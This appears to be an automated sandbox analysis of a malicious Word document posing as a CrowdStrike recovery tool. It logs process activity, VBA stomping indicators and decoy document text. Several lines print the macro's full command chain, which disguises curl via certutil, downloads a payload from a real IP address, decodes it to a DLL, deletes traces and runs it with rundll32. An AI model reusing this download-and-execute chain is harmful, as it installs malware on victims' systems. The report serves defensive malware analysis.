Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exe Section loaded: version.dll
Source: C:\Windows\System32\certutil.exe Section loaded: secur32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ulib.dll
Source: C:\Windows\System32\xcopy.exe Section loaded: ifsutil.dll
Source: C:\Windows\System32\certutil.exe Section loaded: certcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: atl.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exe Section loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exe Section loaded: netutils.dll
Source: C:\Windows\System32\certutil.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: samcli.dll
Source: C:\Windows\System32\certutil.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: atl.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\System32\certutil.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\certutil.exeSection loaded: dwmapi.dll
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr | Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr | Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr | Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr | Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr | Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | Directory created: C:\Program Files\chrome_BITS_3236_441263539
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: curl.pdb source: xcopy.exe, 00000004.00000002.380843327.00000000003FE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381682503.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000005.00000002.381603279.000000000028E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000002.382096180.000000000033E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000007.00000000.382535315.000000013F4DE000.00000002.00000001.01000000.00000004.sdmp, xcopy.exe, 00000013.00000002.518653181.00000000002DE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518999743.0000000002270000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000014.00000002.518944210.00000000000CE000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000015.00000002.519159239.00000000001CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000016.00000000.519432085.000000013F35E000.00000002.00000001.01000000.00000004.sdmp, curl.exe, 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmp, curl.exe.4.dr
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,
Source: curl.exe.4.dr | Static PE information: section name: _RDATA
Source: C:\Windows\System32\xcopy.exe | File created: C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (43 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (23 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (9 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (43 identical entries)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: Steps to Recover Hyper-V virtual machines
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: Using recovery media on Hyper-V virtual machines
Source: document.xml | Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: ph3330 The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.
Source: document.xml | Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: Hyper-V settings
Source: curl.txt.5.dr | Binary or memory string: jQ0qtQUAjVMci0EIQYVBIHQLSIsBSIlE3CBI/8NIg8EQSIPqAXXiRI1CCEiL00yN
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: https://go.microsoft.com/fwlink/?linkid=2280386. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: s Hyper-V settings.
Source: document.xml | Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml | Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: ~WRS{DE15C295-F256-4A62-9AAC-9DBFCAB88B20}.tmp.0.dr, ~WRS{77F4CEDD-379A-4366-B898-F427EB19A4D4}.tmp.16.dr | Binary or memory string: Hyper-V Settings
Source: document.xml | Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml | Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 7_2_000000013F4A1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 7_2_000000013F4DAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 22_2_000000013F35AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE indicator, VBA stomping: true
Source: ~WRC0001.tmp.16.dr | OLE indicator, VBA stomping: true
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
